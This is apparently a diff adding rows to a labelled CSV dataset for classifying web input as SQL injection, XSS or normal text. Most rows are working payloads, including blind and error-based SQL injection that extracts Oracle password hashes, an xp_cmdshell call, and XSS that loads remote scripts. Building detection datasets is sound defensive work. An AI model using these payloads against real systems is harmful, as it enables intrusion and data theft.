+ "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 6 ) ) AND 'i' = 'i",2,SQLi,234
236
+ "1' ) ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( 'gucd' = 'gucd",2,SQLi,235
237
+ "<rb onkeypress=""alert(1)"" contenteditable>test</rb>",1,XSS,236
238
+ <fieldset onpointerup=alert(1)>XSS</fieldset>,1,XSS,237
239
+ "<style>@keyframes slidein {}</style><blink style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></blink>",1,XSS,238
240
+ 1' ) as fyib where 9246 = 9246,2,SQLi,239
241
+ "1' where 6963 = 6963 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,240
242
+ "{""id"":null,""firstName"":""Helen"",""lastName"":""Ho"",""address"":""400 Monroe St, Hoboken, NJ 07030"",""city"":""373"",""telephone"":""6490486526""}",3,normal,241
243
+ "<style>:target {transform: rotate(180deg);}</style><isindex id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></isindex>",1,XSS,242
244
+ "1%"" and 2805 = 1345",2,SQLi,243
245
+ "<% foo><x foo=""%><script>alert(91)</script>"">//[""'`-->]]>]</div>",1,XSS,244
246
+ -6777%' ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( '%' = ',2,SQLi,245
247
+ Select your career.,3,normal,246
248
+ t'exec master..xp_cmdshell 'nslookup www.googl ...,2,SQLi,247
249
+ "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4-- sapi",2,SQLi,248
250
+ "<b draggable=""true"" ondrag=""alert(1)"">test</b>",1,XSS,249
251
+ "<image onmousedown=""alert(1)"">test</image>",1,XSS,250
252
+ Up to 40% off select smart and electronic door locks,3,normal,251
253
+ <cite onpointerleave=alert(1)>XSS</cite>,1,XSS,252
254
+ "<style>@keyframes slidein {}</style><b style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></b>",1,XSS,253
255
+ "1"" ) ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""msjh"" like ""msjh",2,SQLi,254
256
+ "-7584' union all select 1132,1132,1132,1132,1132,1132,1132,1132,1132,1132#",2,SQLi,255
257
+ "1' ) ) as hrra where 9533 = 9533 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,256
258
+ "1' ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 )",2,SQLi,257
259
+ "perl -e 'print \""<IMG SRC=java\0script:alert(\""XSS\"")>\"";' > out",1,XSS,258
260
+ "As an example, here are the steps for most Samsung TVsFrom the Home menu select SettingsFrom that menu select Broadcasting and then choose ""Auto Program""Select Start and if it asks to scan Air or Cable or Both select AirIn about 2 minutes or less scanning should be complete and you'll see the first station in the new guide.",3,normal,259
261
+ "1%"" ) ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",2,SQLi,260
262
+ "<map oncopy=""alert(1)"" contenteditable>test</map>",1,XSS,261
263
+ "<style>@keyframes slidein {}</style><nextid style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></nextid>",1,XSS,262
264
+ "1%' procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,263
265
+ "1%"" ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( ""%"" = """,2,SQLi,264
266
+ "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i",2,SQLi,265
267
+ <summary id=x tabindex=1 onfocusin=alert(1)></summary>,1,XSS,266
268
+ "1%' and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and '%' = '",2,SQLi,267
269
+ "<br oncut=""alert(1)"" contenteditable>test</br>",1,XSS,268
270
+ "<xss draggable=""true"" ondragenter=""alert(1)"" style=display:block>test</xss>",1,XSS,269
271
+ "1' or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,270
272
+ -6722' ) order by 1#,2,SQLi,271
273
+ "<tr onkeyup=""alert(1)"" contenteditable>test</tr>",1,XSS,272
274
+ "iif ( 1305 = 5656,1,1/0 )",2,SQLi,273
275
+ "<keygen onbeforecopy=""alert(1)"" contenteditable>test</keygen>",1,XSS,274
276
+ &lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;,1,XSS,275
277
+ AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP),2,SQLi,276
278
+ Insert the fresh batteries.,3,normal,277
279
+ "1' and make_set ( 8403 = 8403,8899 ) and 'lnwe' = 'lnwe",2,SQLi,278
280
+ "1%"" ) ) union all select null,null#",2,SQLi,279
281
+ "-8943%' ) union all select 7710,7710#",2,SQLi,280
282
+ "<a href=""about:<script>document.vulnerable=true;</script>"">",1,XSS,281
283
+ "<style>:target {color:red;}</style><acronym id=x style=""transition:color 1s"" ontransitionend=alert(1)></acronym>",1,XSS,282
284
+ -4906' ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( 'pkrq' = 'pkrq,2,SQLi,283
285
+ "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><script id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></script>",1,XSS,284
286
+ <source onpointerleave=alert(1)>XSS</source>,1,XSS,285
287
+ "{""id"":null,""firstName"":""Stephan"",""lastName"":""Toh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,286
288
+ `'><script>\xE2\x80\x89javascript:alert(508)</script>,1,XSS,287
289
+ "1' ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( 'zxhn' like 'zxhn",2,SQLi,288
290
+ "1' ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 'snad' like 'snad",2,SQLi,289
291
+ "1%' ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( '%' = '",2,SQLi,290
292
+ "1%' ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( '%' = '",2,SQLi,291
293
+ "1"" ) ) and elt ( 4249 = 4249,7259 ) and ( ( ""abcm"" like ""abcm",2,SQLi,292
294
+ WAITFOR DELAY '0:0:5'--,2,SQLi,293
295
+ "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#",2,SQLi,294
296
+ Save 25% off select Certified Refurbished Philips Hue Smart Bulb Kits,3,normal,295
297
+ "The present governing charter was granted by Elizabeth in 1596, and instituted a governing body of a mayor, fourteen masters or councillors, and an indefinite number of burgesses, including a select body called ""the Twenty-men.""",3,normal,296
298
+ <blink onpointerleave=alert(1)>XSS</blink>,1,XSS,297
299
+ Find and select a TV show or movie to play. 3.,3,normal,298
300
+ 1'+ ( select 'toec' where 5810 = 5810 and sleep ( 5 ) ) +',2,SQLi,299
301
+ <menu id=x contextmenu=x onshow=alert(1)>right click me!,1,XSS,300
302
+ Select the best course for your education.,3,normal,301
303
+ -3297' or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,302
304
+ "Click the photo or photos you want to download to your PC. To select several photos, hold the CTRL key while you click to multi-select photos.",3,normal,303
305
+ %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-,1,XSS,304
306
+ "<!--#exec cmd=""/bin/echo '<SCRIPT SRC'""--><!--#exec cmd=""/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'""-->",1,XSS,305
307
+ "1 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) -- yekf",2,SQLi,306
308
+ "1"" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ""menm"" like ""menm",2,SQLi,307
309
+ or 'whatever' in ('whatever'),2,SQLi,308
310
+ Let's decide where to travel for our vacation.,3,normal,309
311
+ "1' in boolean mode ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,310
312
+ I want to select the right song for the occasion.,3,normal,311
313
+ Where's the best spot to watch the sunrise?,3,normal,312
314
+ "-1485' ) ) ) union all select 7661,7661,7661,7661,7661--",2,SQLi,313
315
+ select ( case when ( 4774 = 1535 ) then 4774 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,314
316
+ Create quiz.,3,normal,315
317
+ Where's your SQL job?,3,normal,316
318
+ -5449' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and 'ryvy' like 'ryvy,2,SQLi,317
319
+ 1'|| ( select 'xugb' from dual where 6772 = 6772,2,SQLi,318
320
+ ORDER BY 27#,2,SQLi,319
321
+ "1'|| ( select 'bccx' where 5881 = 5881 and elt ( 1210 = 1210,sleep ( 5 ) ) ) ||'",2,SQLi,320
322
+ "1' ) ) as fwhv where 3921 = 3921 union all select null,null--",2,SQLi,321
323
+ "-9959"" ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""vcwc"" = ""vcwc",2,SQLi,322
324
+ 1'+ ( select 'gprq' where 8928 = 8928,2,SQLi,323
325
+ "Just as demos for select titles are available for download on the Xbox 360, several game demos can also be downloaded via the PS Store to the PlayStation 3.",3,normal,324
326
+ "<source oncopy=""alert(1)"" contenteditable>test</source>",1,XSS,325
327
+ "<rtc onkeydown=""alert(1)"" contenteditable>test</rtc>",1,XSS,326
328
+ "1"" ) ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( ""abcw"" = ""abcw",2,SQLi,327
329
+ "&lt;A HREF=\""http&#58;//1113982867/\""&gt;XSS&lt;/A&gt;",1,XSS,328
330
+ "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i",2,SQLi,329
331
+ "<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.org/xss.css>; REL=stylesheet"">",1,XSS,330
332
+ "<noframes draggable=""true"" ondragstart=""alert(1)"">test</noframes>",1,XSS,331
333
+ "{""id"":null,""name"":""Abra""}",3,normal,332
334
+ "1"" ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ""pfea"" = ""pfea",2,SQLi,333
335
+ "&apos, OR 1=1",2,SQLi,334
336
+ "javascript:alert()//--></script></textarea></style></title><a""//' onclick=alert()//>*/alert()/*",1,XSS,335
337
+ "-3194"" ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""erua"" = ""erua",2,SQLi,336
338
+ <big id=x tabindex=1 onactivate=alert(1)></big>,1,XSS,337
339
+ "-4817 union all select 7415,7415,7415,7415,7415,7415,7415,7415,7415#",2,SQLi,338
340
+ <select onchange=alert(1)><option>1<option>2,1,XSS,339
341
+ "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23",2,SQLi,340
342
+ "<source draggable=""true"" ondragend=""alert(1)"">test</source>",1,XSS,341
343
+ "1"" ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""nevr"" like ""nevr",2,SQLi,342
344
+ "<picture><source srcset=""validimage.png""><image onloadend=alert(1)></picture>",1,XSS,343
345
+ =(select(0)from(select(sleep(5)))v),2,SQLi,344
346
+ "-5385"" union all select 4577,4577,4577,4577,4577,4577,4577#",2,SQLi,345
347
+ "1"" ) as eefe where 5290 = 5290 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,346
348
+ 1 ) as qwsa where 2874 = 2874,2,SQLi,347
349
+ "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><button id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></button>",1,XSS,348
350
+ "1%"" ) ) and sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,349
351
+ "<style>:target {color: red;}</style><col id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></col>",1,XSS,350
352
+ -1036' ) or 6872 = 6872 and ( 'wvbi' = 'wvbi,2,SQLi,351
353
+ "<tbody onmouseout=""alert(1)"">test</tbody>",1,XSS,352
354
+ "<p oncopy=""alert(1)"" contenteditable>test</p>",1,XSS,353
355
+ -9311 ) ) or ( 5065 = 2572 ) *2572 and ( ( 1199 = 1199,2,SQLi,354
356
+ 1 ) as bozx where 2160 = 2160 and sleep ( 5 ) #,2,SQLi,355
357
+ Select score.,3,normal,356
358
+ "<t:set attributeName=""innerHTML"" targetElement=""x"" to=""&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;"">//[""'`-->]]>]</div>",1,XSS,357
359
+ "That way, you can select a studio that is quiet and won't be over-stimulating for your newborn.",3,normal,358
360
+ "<abbr onkeydown=""alert(1)"" contenteditable>test</abbr>",1,XSS,359
361
+ "select * from users where id = 1 or "";]"" or 1 = 1 -- 1",2,SQLi,360
362
+ "1' ) ) as tgso where 1349 = 1349 union all select null,null,null,null--",2,SQLi,361
363
+ "1' ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( 'ejnt' like 'ejnt",2,SQLi,362
364
+ "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ""%"" = """,2,SQLi,363
365
+ "1"" ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( ""atlz"" = ""atlz",2,SQLi,364
366
+ "<style>:target {color:red;}</style><hgroup id=x style=""transition:color 1s"" ontransitionend=alert(1)></hgroup>",1,XSS,365
367
+ "1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( 'kejy' = 'kejy",2,SQLi,366
368
+ "1'|| ( select 'bpml' where 7360 = 7360 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) ) ||'",2,SQLi,367
369
+ "1 ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( 8048 = 8048",2,SQLi,368
370
+ "{""id"":null,""name"":""Barn Owl""}",3,normal,369
371
+ 1 ) ) as zldh where 3302 = 3302 rlike ( select ( case when ( 1481 = 5677 ) then 1 else 0x28 end ) ) --,2,SQLi,370
372
+ I want to select the perfect spot for the picnic.,3,normal,371
373
+ "<ruby onbeforepaste=""alert(1)"" contenteditable>test</ruby>",1,XSS,372
374
+ 1 ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ),2,SQLi,373
375
+ "{""id"":null,""name"":""adventure parts""}",3,normal,374
376
+ "make_set ( 5679 = 9769,9769 )",2,SQLi,375
377
+ "<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d",1,XSS,376
378
+ <frame onpointerover=alert(1)>XSS</frame>,1,XSS,377
379
+ "1%"" ) union all select null,null,null,null,null,null,null,null--",2,SQLi,378
380
+ "<dl onmouseup=""alert(1)"">test</dl>",1,XSS,379
381
+ "<figcaption onkeyup=""alert(1)"" contenteditable>test</figcaption>",1,XSS,380
382
+ "1%' ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( '%' = '",2,SQLi,381
383
+ 1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,382
384
+ declare @q nvarchar ( 4000 ) select @q =,2,SQLi,383
385
+ "<;XSS STYLE="";behavior: url(http://ha.ckers.org/xss.htc);"";>;",1,XSS,384
386
+ "<body draggable=""true"" ondragenter=""alert(1)"">test</body>",1,XSS,385
387
+ "1"" ) where 9499 = 9499",2,SQLi,386
388
+ on,3,normal,387
389
+ "-4035' union all select 9540,9540,9540,9540,9540,9540,9540,9540,9540,9540--",2,SQLi,388
390
+ "1'+ ( select 'myrb' where 3622 = 3622 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) ) +'",2,SQLi,389
391
+ "<div id=""43""><?xml version=""1.0"" standalone=""no""?>",1,XSS,390
392
+ "1%' ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( '%' = '",2,SQLi,391
393
+ 1 ) where 9078 = 9078 rlike sleep ( 5 ) #,2,SQLi,392
394
+ "select * from users where id = 1 or "" ( ["" or 1 = 1 -- 1",2,SQLi,393
395
+ "1"" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ""vukd"" = ""vukd",2,SQLi,394
396
+ "OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))",2,SQLi,395
397
+ "1' and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and 'qyyg' = 'qyyg",2,SQLi,396
398
+ &lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;,1,XSS,397
399
+ "<ul draggable=""true"" ondrag=""alert(1)"">test</ul>",1,XSS,398
400
+ "1"" where 9919 = 9919",2,SQLi,399
401
+ "select * from users where id = '1' union select $[""],@@VERSION -- 1'",2,SQLi,400
402
+ "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i",2,SQLi,401
403
+ WHERE 1=1 AND 1=1,2,SQLi,402
404
+ "<th draggable=""true"" ondragleave=""alert(1)"">test</th>",1,XSS,403
405
+ <input id=x tabindex=1 onactivate=alert(1)></input>,1,XSS,404
406
+ "<div draggable=""true"" contenteditable>drag me</div><blink ondragover=alert(1) contenteditable>drop here</blink>",1,XSS,405
407
+ transaction,3,normal,406
408
+ <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>,1,XSS,407
409
+ 1'+ ( select ksoh where 6339 = 6339,2,SQLi,408
410
+ "1"" union all select null,null#",2,SQLi,409
411
+ "<FRAME SRC=""javascript:alert('')",1,XSS,410
412
+ "-9922' ) ) union all select 2193,2193,2193--",2,SQLi,411
413
+ "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and 'conm' like 'conm",2,SQLi,412
414
+ "<area onmouseenter=""alert(1)"">test</area>",1,XSS,413
415
+ "1"" ) where 1699 = 1699 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,414
416
+ end and ( ( 6874 = 6874,2,SQLi,415
417
+ Select the gear icon — this will prompt a window to open.,3,normal,416
418
+ "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and 'qjle' = 'qjle",2,SQLi,417
419
+ <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;,1,XSS,418
420
+ "<center oncopy=""alert(1)"" contenteditable>test</center>",1,XSS,419
421
+ "<style>@keyframes x{}</style><link style=""animation-name:x"" onanimationstart=""alert(1)""></link>",1,XSS,420
422
+ "<blockquote onkeyup=""alert(1)"" contenteditable>test</blockquote>",1,XSS,421
423
+ "<td onkeypress=""alert(1)"" contenteditable>test</td>",1,XSS,422
424
+ "1 ) where 9012 = 9012 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,423
425
+ 1 ) rlike sleep ( 5 ) and ( 5724 = 5724,2,SQLi,424
426
+ "1'|| ( select 'bnaz' from dual where 7168 = 7168 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,425
427
+ "1%' and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,426
428
+ "<datalist draggable=""true"" ondragleave=""alert(1)"">test</datalist>",1,XSS,427
429
+ "{""id"":null,""name"":""cause green""}",3,normal,428
430
+ "1"" ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ""fuus"" like ""fuus",2,SQLi,429
431
+ "<input onclick=""alert(1)"">test</input>",1,XSS,430
432
+ "<video autoplay controls onwaiting=alert(1)><source src=""validvideo.mp4"" type=video/mp4></video>",1,XSS,431
433
+ &#x000003c,1,XSS,432
434
+ Apple's CarPlay is coming to select vehicles from Toyota and Lexus.,3,normal,433
435
+ -9358' or 9887 = 2569--,2,SQLi,434
436
+ "<SCRIPT a="">"" '' SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,435
437
+ "-5969"" where 9248 = 9248 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,436
438
+ "<br onmouseup=""alert(1)"">test</br>",1,XSS,437
439
+ "1'|| ( select 'qrle' from dual where 9239 = 9239 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) ||'",2,SQLi,438
440
+ Where is the schema defined?,3,normal,439
441
+ "<bdo onkeyup=""alert(1)"" contenteditable>test</bdo>",1,XSS,440
442
+ <area onpointerup=alert(1)>XSS</area>,1,XSS,441
443
+ "1'+ ( select mumb where 4658 = 4658 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,442
444
+ 1' where 7725 = 7725 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,443
445
+ "<img \x00src=x onerror=""javascript:alert(1)"">",1,XSS,444
446
+ "<figcaption onclick=""alert(1)"">test</figcaption>",1,XSS,445
447
+ "<abbr onmouseout=""alert(1)"">test</abbr>",1,XSS,446
448
+ "<ins oncontextmenu=""alert(1)"">test</ins>",1,XSS,447
449
+ "WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,448
450
+ "1' ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( 'stqq' = 'stqq",2,SQLi,449
451
+ AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337,2,SQLi,450
452
+ "1"" ) as rnjx where 2679 = 2679 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,451
453
+ select ( case when ( 9540 = 5786 ) then 9540 else 9540* ( select 9540 from information_schema.character_sets ) end ) #,2,SQLi,452
454
+ <SCRIPT SRC=http://.rocks/.js?< B >,1,XSS,453
455
+ "<sub draggable=""true"" ondrag=""alert(1)"">test</sub>",1,XSS,454
456
+ "-9166"" ) as hlre where 4768 = 4768 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --",2,SQLi,455
457
+ "<audio draggable=""true"" ondragenter=""alert(1)"">test</audio>",1,XSS,456
458
+ Select your account name at the top right of the screen.,3,normal,457
459
+ <svg><blockquote onload=alert(1)></blockquote>,1,XSS,458
460
+ "( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ""%"" = """,2,SQLi,459
461
+ "1 ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( 3023 = 3023",2,SQLi,460
462
+ "On mobile, select the playlist you want to share, then click on the three dots in the top right of the screen to select Make Collaborative.",3,normal,461
463
+ "1'|| ( select 'xjcg' from dual where 5815 = 5815 union all select null,null,null#",2,SQLi,462
464
+ "{""id"":null,""name"":""else town""}",3,normal,463
465
+ "`""'><img src=xxx:x \x0Aonerror=javascript:alert(1)>",1,XSS,464
466
+ "1"" and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ""ygzq"" like ""ygzq",2,SQLi,465
467
+ "{""id"":null,""name"":""Zonkey""}",3,normal,466
468
+ "1"" ) ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""djrh"" = ""djrh",2,SQLi,467
469
+ "1"" ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ""ieuj"" like ""ieuj",2,SQLi,468
470
+ 1%' ) and sleep ( 5 ) #,2,SQLi,469
471
